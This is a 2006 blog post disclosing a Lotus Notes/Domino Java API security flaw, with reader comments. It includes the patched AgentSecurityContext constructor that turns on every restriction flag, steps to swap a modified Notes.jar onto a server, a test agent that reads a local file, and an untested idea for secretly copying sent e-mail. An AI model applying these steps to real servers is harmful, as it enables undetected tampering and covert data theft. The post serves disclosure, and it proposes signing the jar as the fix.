<< Fighting comment SPAM | Home | Playing around with Notes 8 >>

About

This is the blog of Mikkel Heisterberg about all things Lotus though primarily Notes, Domino, Sametime and Connections. More detailed info about me, incl. bio, can be found on the about me page.

I'm available for consulting work. E-mail me (see the about me page) for address.

Please read the this page for disclaimer, copyright and license information.

Donate to LotusScript.doc!

RSS | Atom | E-mail

Navigate

Categories | Tags | Advanced Search

Tags

Recent Blog Entries

Lotusphere 2009: Session abstract and thoughts on the session
As posted previously I'm so fortunate as have been given a session slot at Lotusphere 2009. The session is titled "From Notes Java developer to Notes 8 plugin developer" and have the below abstract. "Attend this session to learn the basics for ...
Lotus Foundations presentation from Dannotes
Here's the presentation from Dannotes in PDF format (in Danish). Links Lotus Foundations Lotus Foundations wiki Foundations for SMB Lotus Foundations Marketing blog Tags : dannotes presentation
I'm at Dannotes today
I'm at the Dannotes user conference today (Danish Notes User Group) doing a demo of Lotus Foundations, how to install it, how to configure it and just how easy it is to configure Domino on it. Should be fun. Tags : dannotes presentation
Lotusphere 2009: I'll be presenting a session
I'm happy to say that I once again will be speaking at Lotusphere. This time the title of the session will be "From Notes Java Developer to Notes 8 Plug-in Developer" and it will be in the Best Practices track. I'm very excited about this and I'm already ...
Upgrading a Lotus Connections Pilot install
For testing etc. internally I use a Lotus Connections 2.x Pilot install which is working fine for me. Now that 2.0.0 FP1 has been out for some time and 2.0.1 has been released I have wanting to update my install. If nothing else to make sure it worked ...
Lotus Connections 2.0.1 available
As posted by Luis Benitez Lotus Connections 2.0.1 as been shipped. This quarter we shipped Lotus Connections 2.0.1 (on Halloween). If you are upgrading, you can download it from IBM's Fix Central. One question that I'm continuously asked is: "what's ...
Dragging Sametime buddies around
I have been playing a little with the drag'n'drop support in the Notes 8.5 beta client and found out that a VCard is created the you drag a Sametime contact to a place that accepts dragging files to (this probably also works in earlier versions). This ...
rcp.install.id and rcp.base for Notes 8.5 codedrop 12
rcp.install.id=12255...

Recent Responses

Re: LotusScript.doc - HTML interface progressing nicely
Great! I haven't started using this, but I'm hoping to soon. Please be sure to include this blog post on your lsdog.org page.
Re: Lotusphere 2009: Session abstract and thoughts on the session
Sounds you need to start writing a book on this topic. I guess it would be a bestseller (in the Notes environment)
Re: Lotusphere 2009: Session abstract and thoughts on the session
Sounds good to me. I'll be there!
Re: Lotus Foundations presentation from Dannotes
Feel free to link to Lotus Foundations Marketing Blog at http://www.Bilal.ca/ Thanks, Bilal Jaffery Web Marketing Manager - Lotus Foundations
Re: Lotusphere 2009: I'll be presenting a session
Congrats Mikkel! Just make sure you get a picture of Bruce sleeping this time.
Ha!
You beat me too it. Congrats my friend. I look forward to you whacking the podium and yelling out my name - even if I am not sleeping :-)
Re: Dragging Sametime buddies around
Doesn't work with Notes 8.0.2...
Re: rcp.install.id and rcp.base for Notes 8.5 codedrop 12
Thanks for sharing, hard to run eclipse without them ;)
Re: rcp.install.id and rcp.base for Notes 8.5 codedrop 12
technically, the IBM NDA says you can't publically acknowledge you have beta code. So while I agree with you, if IBM wants to enforce the letter of the NDA, they would be right. Just something to watch out for
Re: rcp.install.id and rcp.base for Notes 8.5 codedrop 12
I can't see why two random strings from a code drop that everybody must know exists should be under NDA. If it is I'll of course remove the post but I find that hard to believe.

Domino Java API)

DISCLAIMER
The information below is provided as-is and I cannot be held liable for any damages, direct or indirect, caused by the information in this post or based on the below findings. The information here is offered in the interest of full disclosure. I have been working with IBM Lotus to diagnose and pinpoint the exact consequences of the below findings since May 2006.

Description

As you might know a central security measure in the Notes/Domino security infrastructure is the difference between restricted and unrestricted operations. Only users granted unrestricted access may perform sensitive operations such as disk I/O and manipulating the system clock. The implementation flaw I found in the Java API of Notes/Domino allows me to circumvent these restrictions and hence circumvent the security settings of the Domino server.

As such the guidelines given in this post could also be used to fully replace the Java API and perform additional operations without the knowledge of the owner of the Domino server or Notes client.

Prerequisites

Disk access to the Domino server or Notes client or be able to write an agent or other piece of code that may accomplish the task for you.

Steps to reproduce

Below I describe the steps necessary to circumvent the SecurityManager and/or hide malicious code.

Obtain a copy of the Notes.jar file from the Domino server and copy it to a local workstation.
Unpack the archive using the jar-command.
Decompile the code (I used the JODE version 1.1.2-pre2 decompiler from http://jode.sourceforge.net)

Using Eclipse, or similar, edit the code in the constructor of the lotus.notes.AgentSecurityContext class as shown below:

public AgentSecurityContext(ThreadGroup threadgroup, boolean bool) {
  m_restricted = bool;
  m_file_read = true;
  m_file_write = true;
  m_net_access = true;
  m_class_loader = true;
  m_extern_exec = true;
  m_native_link = true;
  m_system_props = true;

  try {
    AgentSecurityManager agentsecuritymanager = (AgentSecurityManager) System
      .getSecurityManager();
    if (agentsecuritymanager != null)
    agentsecuritymanager.newSecurityContext(this, threadgroup);
   } catch (ClassCastException classcastexception) {
     /* empty */
   }
}

Compile the class and replace the version from the unpacked Notes.jar
Create a new Notes.jar with the manipulated code and replace the Notes.jar on the server. You might have to shutdown the server/client to be able to replace the file.

Using a Domino server in a virtual machine I created a text file called readme.txt in the root of the c-drive on the server and ran the below agent as scheduled on the server. The agent tries to read data from the readme.txt file in the root of the c-drive on the local server (Windows 2000 Server). As expected the JVM throws a java.lang.SecurityException using the Notes.jar supplied with the Domino installation. If I replace the Notes.jar supplied by IBM with my manipulated Notes.jar the agent runs to completion without any incident thus circumventing the security measures put in place by the Domino server.

import lotus.domino.*;
import java.io.*;

public class JavaAgent extends AgentBase {
   public void NotesMain() {
      try {
         Session session = getSession();
         AgentContext agentContext = session.getAgentContext();

         System.out.println("Starting to run agent...");
         FileReader r = new FileReader("c:\\readme.txt");
         StringBuffer buffer = new StringBuffer();
         char[] data = new char[128];
         r.read(data, 0, 127);
         buffer.append(data);
         System.out.println("File data: " + buffer.toString());
         r.close();

      } catch(Exception e) {
         e.printStackTrace();
      }
      
      System.out.println("Done running agent...");
   }
}

Consequences

One thing is being able to circumvent the restricted/unrestricted security measure of the Domino server. Another thing is that this can be done without the administrator or users knowing about it.

As mentioned above you might even be able to use the steps to replace some of the core classes (such as the class implementing the Document interface). By doing this you could have the manipulated class send you a copy of all e-mails generated using the Document.send() method or to add a specific user to all reader/author fields being written to documents.

This should be possible since all the Domino API types are interfaces and as such are open for re-implementation. It does however also mean that you have to manipulate the factory methods of the API.

I must stress that I haven't tried this myself - yet...

Suggestions

Issues like this could be avoided by digitally signing the Notes.jar file provided by IBM and have the Domino server and Notes client verify the signature of the jar-file before loading classes from it. Since a lock is placed on the jar-file by operating system once read (at least on Windows), the impact on performance should be minimal since the jar-file only needs to be checked once.

As an aside I can mention that some of the jar-files provided with the Domino server/Notes client are digitally signed by IBM already:

ibmjcefips.jar
ibmjceprovider.jar
ibmpkcs11.jar
ibmpkcs11impl.jar

Resources

Responses[10]

Posted by Mikkel Heisterberg on 07 December 2006 12:14:47 CET #

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

Comment from Bob Balaban on 08 December 2006 01:31:01 CET #

Interesting! Thanks for reporting it. I would point out that there are many ways in which the Domino server security model depends on the physical security of the server computer itself. In other words, you should not have the ability to replace an executable file on the server, and if you in fact did not have that ability, your hack would not work. The same attack technique could really be applied to any module in anyone's software (e.g., replace some DLL in Word, or whatever). Of course, the attacker's task is made easier by the fact that it is very easy to decompile Java binaries. Perhaps IBM should think more about obfuscating.

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

Comment from Mikkel Heisterberg on 08 December 2006 07:15:05 CET #

I would agree that obfuscating would be an obvious thing to do, but primarily to make the jar-file smaller. I really do not like security by obscurity - I would rather that IBM signed the jar-file and allowed you to have the JVM verify jar-files loaded through the built in classloader. It should also be able to verify third party jar-files but notes.jar is by far the most important.

As to physical access the reason that I brought this to the attention of IBM is that it is an "attack" that's very difficult to see. Most customers I work with will never check the notes.jar file to see if it's the one supplied by IBM. A server task or extension (using the extension manager) you can see in the server console or in the notes.ini. A change to notes.jar would in almost every case go unnoticed.

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

Comment from Axel Janssen on 08 December 2006 09:52:49 CET #

I think 99.99% of the JVM of J2EE Servers run with SecurityManager turned out. Tomcat runs by default with SecurityManager turned out. http://tomcat.apache.org/tomcat-5.5-doc/security-manager-howto.html Code signing isn't taken very serious in this classical client-server environments. Its taken far more serious in jini, but there was not much market demand (except in certain sectors like investment banking where they actually send excecutable code around).

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

Comment from Axel Janssen on 08 December 2006 10:51:31 CET #

oopsy. Serious english bug: I wanted to say: SecurityManager turned off. not turned out. sorry.

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

Comment from Mikkel Heisterberg on 08 December 2006 11:38:30 CET #

Well I figured as much... :-)

IMHO the problem with developers not using SecurityManagers is only going to get bigger as more and more "traditional" software is written in Java as well.

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

Comment from Richard Schwartz on 08 December 2006 12:46:57 CET #

I can think of lots of ways to breach security by replacing nnotes.dll on a server. Of course, it wouldn't be quite as easy as what you document here, but the truth is that if you can't secure the filesystem that holds the exectutable code, you can't secure anything. Signing notes.jar would fail as soon as someone figured out how to hack the DLL code that validates the signature. Sign that DLL code, and the next target for the hacker will be whatever code validates that signature.

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

Comment from Axel on 09 December 2006 22:50:24 CET #

Again: If you take a look on other environments, signing server-side code is very uncommon. There is no or very little code signing in PHP, fat client DB programming, perl, J2EE, etc. Although in Java there is a security manager deeply included in the language and an infrastructure for code signing, authorization of signed code, etc, all this stuff is very,very rarely used for server side code and maybe for a good reason. Its an issue in Applets. But Applets means that the client downloads excecutable code while surfing the internet and thats a completly different story than just communicating with a server over a protocol. I know its a big issue in jini (all I know about jini is from 3-part interview of Dick Walls from javaposse some month ago). Jini also has this strong focus on distribute excecutable code. Making list even a bit longer, in Eclipse-plug-ins / RCP the whole code signing issue isn't a prominent issue neither btw. If you download a new plug-in you are asked to trust the organization which has created the code. Thats all, afaik. Its allways a question if the aditional hazzle is worth this specific security feature. And that is very dependent on the specific circumstances.

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

Comment from Mikkel Heisterberg on 10 December 2006 14:04:06 CET #

I think you have to approach this subject from two perspectives. One is the way we can handle it when dealing with server-side software such as J2EE or PHP applications. The other side to the story is client software where you have much less control over how the software is executed. While I agree that is it more safe to not sign server side code than client side code but that doesn't mean that code signing doesn't have its place. I would really like all code to be signed as a general rule. Much like it is in Notes.

I think the real reason code signing is being ignored or why it isn't being used, is due to the cost of purchasing and maintaining code signing certificates.

You're right that code signing isn't taken serious in Sametime plugins either. I would really like a way to either not allow users to download new plugins or not download plugins signed by a specific certificate. Much like it is possible to lock down the Notes workstation using ECL at present.

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

Comment from Andrei Kouvchinnikov on 11 December 2006 10:40:54 CET #

This exploit requires access to server's file system, which by definition is restricted to network administrators. If someone got access to the file system, they could do much more damage than replacing a Notes.jar file. They could copy the server.id file and sign their own agents as they wish, especially considering that server's id file is not password-protected. I guess IBM will not fix this in the near future because: 1) Your own fault that server's file system is not protected from unauthorized access. 2) On client, users has full access anyway, so a flawed agent is far less harmfull than a new free screensaver they downloaded yesterday from a link on warez site.

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

Comment from Fabian Robok on 13 December 2006 23:36:02 CET #

"They could copy the server.id file and sign their own agents as they wish, especially considering that server's id file is not password-protected." Just to make this point very clear, for sure the server id *can* and *should* have a password. At least, if you go with Jack Dausman's point of view.

Add a comment

December 2006
Mon	Tue	Wed	Thu	Fri	Sat	Sun
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31
Nov \| Today \| Jan

2008 November (8) October (10) September (15) August (18) July (12) June (14) May (26) April (22) March (32) February (29) January (37)	2007 December (17) November (24) October (20) September (23) August (20) July (9) June (17) May (24) April (12) March (8) February (18) January (33)
2006 December (13) November (29) October (32) September (22) August (30) July (18) June (47) May (33) April (43) March (28) February (28) January (20)	2005 December (14) November (19) October (11) September (13) August (24) July (22) June (0) May (0) April (9) March (14) February (10) January (3)
2004 December (13) November (6)

Re: Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API) Comment from Anonymous on 18 November 2008 18:51:28 CET #
Title
Body	HTML : b, strong, i, em, blockquote, br, p, pre, a href="", ul, ol, li, sub, sup
Name
E-mail address
Website
Remember me	Yes No
E-mail addresses are not publicly displayed, so please only leave your e-mail address if you would like to be notified when new comments are added to this blog entry (you can opt-out later).

Username
Password
Remember me